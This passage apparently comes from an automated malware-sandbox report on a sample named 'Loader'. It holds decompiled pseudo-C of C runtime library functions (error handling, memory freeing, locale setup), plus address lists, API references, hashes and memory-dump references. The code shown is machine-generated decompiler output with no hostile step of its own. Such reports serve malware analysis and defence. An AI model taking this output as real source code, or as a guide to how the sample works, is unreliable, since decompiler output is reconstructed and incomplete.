				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0xb36d20; // 0x5
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00AF6B67(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t30 = E00AF4A92(1, 0x364); // executed
						_t51 = _t30;
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00AF6B67(__eflags,  *0xb36d20, _t51);
							if(__eflags != 0) {
								E00AF466E(_t51, "(4}");
								E00AF4AEF(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00AF6B67(__eflags,  *0xb36d20, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00AF6B67(0,  *0xb36d20, 0);
							_push(0);
							L9:
							E00AF4AEF();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00AF6B28(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0xb36d20; // 0x5
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E00AF0E59(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0xb36d20; // 0x5
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00AF6B67(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00AF4A92(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00AF6B67(__eflags,  *0xb36d20, _t60);
								if(__eflags != 0) {
									E00AF466E(_t60, "(4}");
									E00AF4AEF(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00AF6B67(__eflags,  *0xb36d20, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00AF6B67(__eflags,  *0xb36d20, _t20);
								_push(_t60);
								L25:
								E00AF4AEF();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00AF6B28(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0xb36d20; // 0x5
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E00AF0E59(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0xb36d20; // 0x5
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00AF6B67(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00AF4A92(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00AF6B67(__eflags,  *0xb36d20, _t54);
											if(__eflags != 0) {
												E00AF466E(_t54, "(4}");
												E00AF4AEF(0);
												goto L45;
											} else {
												_t40 = 0;
												E00AF6B67(__eflags,  *0xb36d20, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00AF6B67(0,  *0xb36d20, 0);
											_push(0);
											L41:
											E00AF4AEF();
											goto L36;
										}
									}
								} else {
									_t54 = E00AF6B28(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0xb36d20; // 0x5
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00af4840
0x00af4840
0x00af484b
0x00af484d
0x00af4852
0x00af4855
0x00af4873
0x00af4876
0x00af487b
0x00af487d
0x00000000
0x00af487f
0x00af4886
0x00af488b
0x00af488e
0x00af488f
0x00af4891
0x00af48b6
0x00af48b8
0x00af48d1
0x00af48d8
0x00af48dd
0x00000000
0x00af48ba
0x00af48ba
0x00af48c3
0x00af48c8
0x00000000
0x00af48c8
0x00af4893
0x00af4893
0x00af4893
0x00af489c
0x00af48a1
0x00af48a2
0x00af48a2
0x00af48a7
0x00000000
0x00af48a7
0x00af4891
0x00af4857
0x00af485d
0x00af4861
0x00af486e
0x00000000
0x00af4863
0x00af4866
0x00af48e0
0x00af48e0
0x00af4868
0x00af4868
0x00af4868
0x00af486a
0x00af486a
0x00af486a
0x00af4866
0x00af4861
0x00af48e3
0x00af48eb
0x00af48ed
0x00af48ef
0x00af48f7
0x00af48fc
0x00af48fd
0x00af4902
0x00af4903
0x00af4906
0x00af4920
0x00af4923
0x00af4928
0x00af492a
0x00000000
0x00af492c
0x00af4938
0x00af493b
0x00af493c
0x00af493e
0x00af4961
0x00af4963
0x00af497a
0x00af4981
0x00af4986
0x00000000
0x00af4965
0x00af496c
0x00af4971
0x00000000
0x00af4971
0x00af4940
0x00af4947
0x00af494c
0x00af494d
0x00af494d
0x00af4952
0x00000000
0x00af4952
0x00af493e
0x00af4908
0x00af490e
0x00af4910
0x00af4912
0x00af491b
0x00000000
0x00af4914
0x00af4914
0x00af4917
0x00af4991
0x00af4991
0x00af4996
0x00af4999
0x00af499a
0x00af499b
0x00af49a2
0x00af49a4
0x00af49a9
0x00af49ac
0x00af49ca
0x00af49cd
0x00af49d2
0x00af49d4
0x00000000
0x00af49d6
0x00af49e2
0x00af49e6
0x00af49e8
0x00af4a0d
0x00af4a0f
0x00af4a28
0x00af4a2f
0x00000000
0x00af4a11
0x00af4a11
0x00af4a1a
0x00af4a1f
0x00000000
0x00af4a1f
0x00af49ea
0x00af49ea
0x00af49ea
0x00af49f3
0x00af49f8
0x00af49f9
0x00af49f9
0x00000000
0x00af49fe
0x00af49e8
0x00af49ae
0x00af49b4
0x00af49b6
0x00af49b8
0x00af49c5
0x00000000
0x00af49ba
0x00af49ba
0x00af49bd
0x00af4a37
0x00af4a37
0x00af49bf
0x00af49bf
0x00af49bf
0x00af49bf
0x00af49c1
0x00af49c1
0x00af49c1
0x00af49bd
0x00af49b8
0x00af4a3a
0x00af4a42
0x00af4a44
0x00af4a44
0x00af4a4b
0x00af4919
0x00af4989
0x00af4989
0x00af498b
0x00000000
0x00af498d
0x00af4990
0x00af4990
0x00af498b
0x00af4917
0x00af4912
0x00af48f1
0x00af48f6
0x00af48f6

APIs

GetLastError.KERNEL32(?,00000000,?,00AED8CE,00000000,00000000,?,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF4845
_free.LIBCMT ref: 00AF48A2
_free.LIBCMT ref: 00AF48D8
SetLastError.KERNEL32(00000000,00000005,000000FF,?,00AF6FF2,00000000,00000000,?,00000000,?), ref: 00AF48E3

Strings

(4}, xrefs: 00AF48CB

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: (4}
API String ID: 2283115069-1551970364
Opcode ID: 84c72eda079c6a8a3c9f1c4b213775de9cb4d53ca8bbb0faae145cb0c74c4086
Instruction ID: bd54bac2780dc212a195fb10fb62cfcf6b8bc96e379498b20fb2c13c79775afb
Opcode Fuzzy Hash: 84c72eda079c6a8a3c9f1c4b213775de9cb4d53ca8bbb0faae145cb0c74c4086
Instruction Fuzzy Hash: C211CE3234064C3AE61137F5AD86E3F266AABC93F0B340634F324D71E2EF218C0092A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AF29A7 Relevance: 7.7, APIs: 5, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00AF29A7(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				intOrPtr _v736;
				signed int* _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1268;
				intOrPtr _v1284;
				signed int _v1288;
				intOrPtr _v1324;
				signed int _v1336;
				void* __ebp;
				signed int _t249;
				signed int _t251;
				void* _t254;
				signed int _t257;
				signed int _t259;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t277;
				signed int _t280;
				signed int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				intOrPtr _t292;
				signed int _t295;
				signed int _t297;
				signed int _t298;
				signed int _t301;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t310;
				signed int _t326;
				signed int _t328;
				signed int _t330;
				signed int _t334;
				void* _t335;
				signed int _t337;
				void* _t338;
				intOrPtr _t339;
				signed int _t343;
				signed int _t344;
				intOrPtr* _t349;
				signed int _t363;
				signed int _t365;
				void* _t366;
				signed int _t367;
				intOrPtr* _t368;
				signed int _t370;
				void* _t371;
				void* _t375;
				signed int _t379;
				intOrPtr* _t380;
				intOrPtr* _t383;
				void* _t386;
				signed int _t387;
				signed int _t390;
				intOrPtr* _t391;
				char* _t398;
				intOrPtr _t402;
				intOrPtr* _t403;
				signed int _t405;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t415;
				intOrPtr* _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				short _t459;
				signed int _t461;
				signed int _t462;
				void* _t464;
				void* _t465;
				signed int _t466;
				void* _t467;
				void* _t468;
				signed int _t469;
				void* _t471;
				void* _t472;
				signed int _t484;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t249 = E00AF548F(0x6a6); // executed
				_t363 = _t249;
				_t250 = 0;
				_pop(_t375);
				if(_t363 == 0) {
					L20:
					return _t250;
				} else {
					_push(__edi);
					 *_t363 = 1;
					_t2 = _t363 + 4; // 0x4
					_t428 = _t2;
					_t444 = _a4;
					 *_t428 = 0;
					_t251 = _t444 + 0x30;
					_push( *_t251);
					_v16 = _t251;
					_push(0xb09628);
					_push( *0xb09564);
					E00AF28E3(_t363, _t375, __edx, _t428, _t444, _t428, 0x351, 3);
					_t465 = _t464 + 0x18;
					_v8 = 0xb09564;
					while(1) {
						L2:
						_t254 = E00AFB9E3(_t428, 0x351, 0xb09624);
						_t466 = _t465 + 0xc;
						if(_t254 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t415 = _t8;
							_t343 =  *_v16;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t343;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t344 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t343 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t343 = _t343 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0xb09628);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t344);
							_t349 = _v8 + 0xc;
							_v8 = _t349;
							_push( *_t349);
							E00AF28E3(_t363, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t465 = _t466 + 0x18;
							if(_v8 < 0xb09594) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E00AF4AEF(_t363);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E00AF4AEF( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E00AF4AEF( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t250 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t484 =  *(_t444 + 0x28);
									if(_t484 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t484 == 0) {
											E00AF4AEF( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E00AF4AEF( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t28 = _t363 + 4; // 0x4
									_t250 = _t28;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t363;
									 *((intOrPtr*)(_t444 + 0x20)) = _t250;
								}
								goto L20;
							}
							goto L134;
						}
						asm("sbb eax, eax");
						_t344 = _t343 | 0x00000001;
						__eflags = _t344;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00AED26C();
					asm("int3");
					_t461 = _t466;
					_t467 = _t466 - 0x1d0;
					_t257 =  *0xb36bac; // 0x85d5fe2b
					_v60 = _t257 ^ _t461;
					_t259 = _v44;
					_push(_t363);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t259;
					if(_t259 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t365 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t259 = E00AF29A7(_t365, _t424, _t429, _t445, __eflags, _t429); // executed
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t259 = E00AF251D(_t365, _t424, _t429, _t445, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t468 = _t467 + 0x18;
								__eflags = _t259;
								if(_t259 != 0) {
									_t379 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t265 = _v460;
										} else {
											_t380 =  *_t425;
											_t266 =  &_v276;
											while(1) {
												__eflags =  *_t266 -  *_t380;
												_t429 = _v464;
												if( *_t266 !=  *_t380) {
													break;
												}
												__eflags =  *_t266;
												if( *_t266 == 0) {
													L67:
													_t379 = 0;
													_t267 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t266 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t380 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t380 + 2))) {
														break;
													} else {
														_t266 = _t266 + 4;
														_t380 = _t380 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t267;
												if(_t267 == 0) {
													_t365 = _t365 + 1;
													__eflags = _t365;
													goto L74;
												} else {
													_t268 =  &_v276;
													_push(_t268);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t468 = _t468 + 0xc;
													__eflags = _t268;
													if(_t268 == 0) {
														_t379 = 0;
														_t265 = 0;
														_v460 = 0;
													} else {
														_t365 = _t365 + 1;
														_t379 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t267 = _t266 | 0x00000001;
											_t379 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t265;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t365;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t259 = _t379;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t269 = E00AFDE99(_t445, 0xb0961c);
											_t367 = _t269;
											_v468 = _t367;
											_pop(_t382);
											__eflags = _t367;
											if(_t367 == 0) {
												break;
											}
											_t270 = _t269 - _t445;
											__eflags = _t270;
											_v460 = _t270 >> 1;
											if(_t270 == 0) {
												break;
											} else {
												_t272 = 0x3b;
												__eflags =  *_t367 - _t272;
												if( *_t367 == _t272) {
													break;
												} else {
													_t432 = _v460;
													_t368 = 0xb09564;
													_v456 = 1;
													do {
														_t273 = E00AF44C8( *_t368, _t445, _t432);
														_t467 = _t467 + 0xc;
														__eflags = _t273;
														if(_t273 != 0) {
															goto L45;
														} else {
															_t383 =  *_t368;
															_t424 = _t383 + 2;
															do {
																_t339 =  *_t383;
																_t383 = _t383 + 2;
																__eflags = _t339 - _v472;
															} while (_t339 != _v472);
															_t382 = _t383 - _t424 >> 1;
															__eflags = _t432 - _t383 - _t424 >> 1;
															if(_t432 != _t383 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t368 = _t368 + 0xc;
														__eflags = _t368 - 0xb09594;
													} while (_t368 <= 0xb09594);
													_t365 = _v468 + 2;
													_t274 = E00AFDE40(_t382, _t365, 0xb09624);
													_t429 = _v464;
													_t448 = _t274;
													_pop(_t386);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t387 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t277 = E00AFBB23( &_v276, 0x83, _t365);
															_t469 = _t467 + 0x10;
															__eflags = _t277;
															if(_t277 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00AED26C();
																asm("int3");
																_push(_t461);
																_t462 = _t469;
																_t280 =  *0xb36bac; // 0x85d5fe2b
																_v560 = _t280 ^ _t462;
																_push(_t365);
																_t370 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t370;
																_v1284 = E00AF4840(_t386, _t424) + 0x278;
																_t287 = E00AF251D(_t370, _t424, _t433, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1268);
																_t471 = _t469 - 0x2e4 + 0x18;
																__eflags = _t287;
																if(_t287 == 0) {
																	L122:
																	_t288 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t370 + 2; // 0x6
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t290 =  &_v280;
																	_v720 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t390 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t290 -  *_t390;
																		_t454 = _v720;
																		if( *_t290 !=  *_t390) {
																			break;
																		}
																		__eflags =  *_t290;
																		if( *_t290 == 0) {
																			L89:
																			_t291 = _v712;
																		} else {
																			_t459 =  *((intOrPtr*)(_t290 + 2));
																			__eflags = _t459 -  *((intOrPtr*)(_t390 + 2));
																			_v714 = _t459;
																			_t454 = _v720;
																			if(_t459 !=  *((intOrPtr*)(_t390 + 2))) {
																				break;
																			} else {
																				_t290 = _t290 + 4;
																				_t390 = _t390 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t291;
																		if(_t291 != 0) {
																			_t391 =  &_v280;
																			_t424 = _t391 + 2;
																			do {
																				_t292 =  *_t391;
																				_t391 = _t391 + 2;
																				__eflags = _t292 - _v712;
																			} while (_t292 != _v712);
																			_v716 = (_t391 - _t424 >> 1) + 1;
																			_t295 = E00AF548F(4 + ((_t391 - _t424 >> 1) + 1) * 2);
																			_v732 = _t295;
																			__eflags = _t295;
																			if(_t295 == 0) {
																				goto L122;
																			} else {
																				_v728 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t370 * 4);
																				_v752 =  *(_t433 + 8);
																				_t398 =  &_v280;
																				_v736 = _t295 + 4;
																				_t297 = E00AF7AB0(_t295 + 4, _v716, _t398);
																				_t472 = _t471 + 0xc;
																				__eflags = _t297;
																				if(_t297 != 0) {
																					_t298 = _v712;
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					_push(_t298);
																					E00AED26C();
																					asm("int3");
																					_push(_t462);
																					_push(_t398);
																					_v1336 = _v1336 & 0x00000000;
																					_t301 = E00AF6BA9(_v1324, 0x20001004,  &_v1336, 2);
																					__eflags = _t301;
																					if(_t301 == 0) {
																						L132:
																						return 0xfde9;
																					}
																					_t303 = _v20;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L132;
																					}
																					return _t303;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v736;
																					if(_v280 != 0x43) {
																						L100:
																						_t306 = E00AF223A(_t370, _t433,  &_v708);
																						_t424 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t424 = _v712;
																							_t306 = _t424;
																						}
																					}
																					 *(_t433 + 0xa0 + _t370 * 4) = _t306;
																					__eflags = _t370 - 2;
																					if(_t370 != 2) {
																						__eflags = _t370 - 1;
																						if(_t370 != 1) {
																							__eflags = _t370 - 5;
																							if(_t370 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v724;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v724;
																						}
																					} else {
																						_t458 = _v740;
																						 *(_t433 + 8) = _v724;
																						_v716 = _t458[8];
																						_t410 = _t458[9];
																						_v724 = _t410;
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *(_t458 + _t424 * 8);
																							if( *(_t433 + 8) ==  *(_t458 + _t424 * 8)) {
																								break;
																							}
																							_t334 =  *(_t458 + _t424 * 8);
																							_t410 =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _v724;
																							_t424 = _t424 + 1;
																							_t370 = _v744;
																							_v716 = _t334;
																							_v724 = _t410;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t326 = E00AF777A(__eflags, _v712, 1, 0xb094d8, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t472 = _t472 + 0x1c;
																								__eflags = _t326;
																								if(_t326 == 0) {
																									_t411 = _v712;
																								} else {
																									_t328 = _v712;
																									do {
																										 *(_t462 + _t328 * 2 - 0x20c) =  *(_t462 + _t328 * 2 - 0x20c) & 0x000001ff;
																										_t328 = _t328 + 1;
																										__eflags = _t328 - 0x7f;
																									} while (_t328 < 0x7f);
																									_t330 = E00AEAC10( &_v536,  *0xb36d14, 0xfe);
																									_t472 = _t472 + 0xc;
																									__eflags = _t330;
																									_t411 = 0 | _t330 == 0x00000000;
																								}
																								_t458[1] = _t411;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v716;
																							 *(_t458 + 4 + _t424 * 8) = _t410;
																						}
																						goto L108;
																					}
																					L120:
																					_t307 = _t370 * 0xc;
																					_t204 = _t307 + 0xb09560; // 0xae861f
																					 *0xb05148(_t433);
																					_t309 =  *((intOrPtr*)( *_t204))();
																					_t402 = _v728;
																					__eflags = _t309;
																					if(_t309 == 0) {
																						__eflags = _t402 - 0xb36de8;
																						if(_t402 == 0xb36de8) {
																							L127:
																							_t310 = _v720;
																						} else {
																							_t457 = _t370 + _t370;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E00AF4AEF( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E00AF4AEF( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E00AF4AEF( *(_t433 + 0xa0 + _t370 * 4));
																								_t310 = _v720;
																								_t405 = _v712;
																								 *(_t310 + _t433) = _t405;
																								 *(_t433 + 0xa0 + _t370 * 4) = _t405;
																							}
																						}
																						_t403 = _v732;
																						 *_t403 = 1;
																						_t288 =  *(_t310 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t370 + _t370) * 8)) = _t403;
																					} else {
																						 *((intOrPtr*)(_v720 + _t433)) = _t402;
																						E00AF4AEF( *(_t433 + 0xa0 + _t370 * 4));
																						 *(_t433 + 0xa0 + _t370 * 4) = _v748;
																						E00AF4AEF(_v732);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t288 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t462;
																			_pop(_t371);
																			return E00AE95ED(_t288, _t371, _v16 ^ _t462, _t424, _t434, _t450);
																		}
																		goto L134;
																	}
																	asm("sbb eax, eax");
																	_t291 = _t290 | 0x00000001;
																	__eflags = _t291;
																	goto L91;
																}
															} else {
																_t335 = _t448 + _t448;
																__eflags = _t335 - 0x106;
																if(_t335 >= 0x106) {
																	E00AE9D84();
																	goto L82;
																} else {
																	 *((short*)(_t461 + _t335 - 0x10c)) = 0;
																	_t337 =  &_v276;
																	_push(_t337);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t387 = _v452;
																	_t467 = _t469 + 0xc;
																	__eflags = _t337;
																	if(_t337 != 0) {
																		_t387 = _t387 + 1;
																		_v452 = _t387;
																	}
																	L54:
																	_t445 = _t365 + _t448 * 2;
																	_t275 =  *_t445 & 0x0000ffff;
																	_t424 = _t275;
																	__eflags = _t275;
																	if(_t275 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t387;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t338 = 0x3b;
														__eflags =  *_t365 - _t338;
														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E00AE95ED(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}

0x00af29a7
0x00af29af
0x00af29b0
0x00af29b9
0x00af29bc
0x00af29c1
0x00af29c3
0x00af29c5
0x00af29c8
0x00af2ae5
0x00af2ae8
0x00af29ce
0x00af29ce
0x00af29cf
0x00af29d1
0x00af29d1
0x00af29d4
0x00af29d7
0x00af29da
0x00af29dd
0x00af29df
0x00af29e2
0x00af29e7
0x00af29f5
0x00af29ff
0x00af2a02
0x00af2a05
0x00af2a05
0x00af2a10
0x00af2a15
0x00af2a1a
0x00000000
0x00af2a20
0x00af2a23
0x00af2a23
0x00af2a26
0x00af2a28
0x00af2a2b
0x00af2a2d
0x00af2a2d
0x00af2a2d
0x00af2a30
0x00af2a30
0x00af2a30
0x00af2a36
0x00000000
